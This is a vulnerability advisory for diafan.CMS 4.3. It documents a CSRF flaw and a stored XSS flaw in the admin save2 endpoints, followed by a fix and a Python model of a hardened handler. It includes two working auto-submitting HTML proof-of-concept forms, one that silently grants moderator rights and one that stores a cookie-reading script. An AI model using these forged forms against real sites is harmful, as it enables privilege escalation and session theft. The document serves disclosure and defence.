High-Tech
Affected Version: diafan.CMS 4.3
Vendor: http://www.diafan.ru/
Vulnerability Type: Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS)
Vulnerability Description: CSRF. The script at "http://host/admin/usersite/save2/" does not verify the source of the HTTP request, so a forged cross-site POST is processed as if the logged-in administrator had submitted the user-edit form himself. The PoC below resubmits the record of user id 2 with the "moderator" field set to 1.
Successful exploitation may let an attacker compromise the application, steal cookie-based authentication credentials, or disclose or modify sensitive data.
POC:
<!-- target: the unprotected save2 handler named above; the form is named "main" to match the submit() call at the end -->
<form action="http://host/admin/usersite/save2/" method="post" name="main">
<input type="hidden" name="noOut" value="1">
<input type="hidden" name="save_post" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="fio" value="first name">
<input type="hidden" name="name" value="userlogin">
<input type="hidden" name="password" value="">
<input type="hidden" name="mail" value="email@example.com">
<input type="hidden" name="created" value="23.12.2010">
<input type="hidden" name="act" value="1">
<!-- the privilege change the forged request carries -->
<input type="hidden" name="moderator" value="1">
<input type="hidden" name="language" value="">
<input type="hidden" name="phone" value="phone">
<input type="hidden" name="city" value="city">
<input type="hidden" name="street" value="street">
<input type="hidden" name="home" value="5">
<input type="hidden" name="corps" value="">
<input type="hidden" name="flat" value="98">
</form>
<!-- auto-submit as soon as the administrator's browser loads the attacker's page -->
<script>document.main.submit();</script>
XSS vulnerability 1:
This vulnerability exists because content submitted to "http://host/admin/site/save2/" is not strictly filtered: script placed in the page text is stored with the page content and executes in the browser of whoever views it. The PoC delivers the payload through the same unprotected cross-site form submission as the CSRF above. Successful exploitation may let an attacker compromise the application, steal cookie-based authentication credentials, or disclose or modify sensitive data.
POC:
<form action="http://host/admin/site/save2/" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="noOut" value="1">
<input type="hidden" name="save_post" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="name" value="page name">
<input type="hidden" name="act" value="1">
<input type="hidden" name="actm" value="1">
<input type="hidden" name="title_meta" value="title">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="descr" value="">
<input type="hidden" name="rewrite" value="sef_url">
<input type="hidden" name="addmodule" value="">
<input type="hidden" name="parent_id" value="">
<input type="hidden" name="sort" value="2">
<input type="hidden" name="theme" value="">
<input type="hidden" name="othurl" value="">
<!-- the payload is the page body itself; save2 stores it unfiltered and it fires when the page renders -->
<input type="hidden" name="text" value="content html<script>alert(document.cookie)</script>">
</form>
<script>document.main.submit();</script>
Fix:
Verify the source of every state-changing HTTP request in the save2 scripts (for example, bind a secret anti-CSRF token to the administrator's session and reject submissions that do not carry it), and strictly filter or encode submitted content before it is stored and rendered.
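A minimal model of the save2 endpoint with and without the two fixes, as an added example that is not part of this advisory or of diafan.CMS. The vulnerable handler accepts any POST that arrives with the administrator's session cookie and stores the "text" field as sent; the hardened handler first checks that the Origin (or Referer) header names the site's own host and that the form carries the anti-CSRF token bound to the session, then HTML-encodes the field before storing it. The request and session dictionaries, SITE_HOST, and every function name are assumptions for illustration, and the sample traffic is constructed, not captured from a real install.

```python
import hmac
import html
import secrets
from urllib.parse import urlparse

SITE_HOST = "host"  # assumed hostname of the CMS install, as in the advisory's PoC URLs


def vulnerable_save2(request, session):
    """Mirrors the flaw in the advisory: any POST that reaches the handler with
    the administrator's session is honoured, and 'text' is stored verbatim."""
    if not session.get("is_admin"):
        return 403, None
    form = request["form"]
    return 200, {"id": form["id"], "text": form["text"]}


def issue_csrf_token(session):
    """Create a per-session anti-CSRF token; the real edit form embeds it as a
    hidden field, which a forged form on another site cannot know."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def request_origin_ok(request, site_host):
    """First source check: the browser-supplied Origin (or Referer) must name
    this site. A missing header is treated as cross-site."""
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not origin:
        return False
    return urlparse(origin).hostname == site_host


def csrf_token_ok(request, session):
    """Second source check: the submitted token must equal the session's token,
    compared in constant time."""
    expected = session.get("csrf_token")
    supplied = request["form"].get("csrf_token")
    if not expected or not isinstance(supplied, str):
        return False
    return hmac.compare_digest(expected.encode(), supplied.encode())


def hardened_save2(request, session):
    """Same endpoint with both fixes applied: reject forged requests, and encode
    the stored content so injected script is rendered as text."""
    if not session.get("is_admin"):
        return 403, None
    if not request_origin_ok(request, SITE_HOST) or not csrf_token_ok(request, session):
        return 403, None
    form = request["form"]
    return 200, {"id": form["id"], "text": html.escape(form["text"])}


# --- constructed sample traffic (illustrative, not from a real diafan.CMS) ---
ADMIN_SESSION = {"is_admin": True}

# The auto-submitted attacker form: the victim's browser attaches the admin
# cookie, but Origin is the attacker's page and no token is present.
FORGED_REQUEST = {
    "headers": {"Origin": "http://attacker.example"},
    "form": {"id": "2", "text": "content html<script>alert(document.cookie)</script>"},
}


def legitimate_request(session):
    """What the CMS's own edit form sends once it carries the session token."""
    return {
        "headers": {"Origin": "http://" + SITE_HOST},
        "form": {"id": "2", "text": "<p>hello</p>", "csrf_token": issue_csrf_token(session)},
    }


if __name__ == "__main__":
    print(vulnerable_save2(FORGED_REQUEST, ADMIN_SESSION))   # accepted, script stored
    print(hardened_save2(FORGED_REQUEST, ADMIN_SESSION))     # (403, None)
    print(hardened_save2(legitimate_request(ADMIN_SESSION), ADMIN_SESSION))
```

The Origin check alone is not enough (older clients omit the header, and a lenient parser can be fooled), which is why the token is required as well. For a CMS body field that is meant to hold HTML, html.escape would also break legitimate markup; there the production answer is an allowlist HTML sanitizer, and the escape here only shows the principle that stored content must never reach the browser unfiltered.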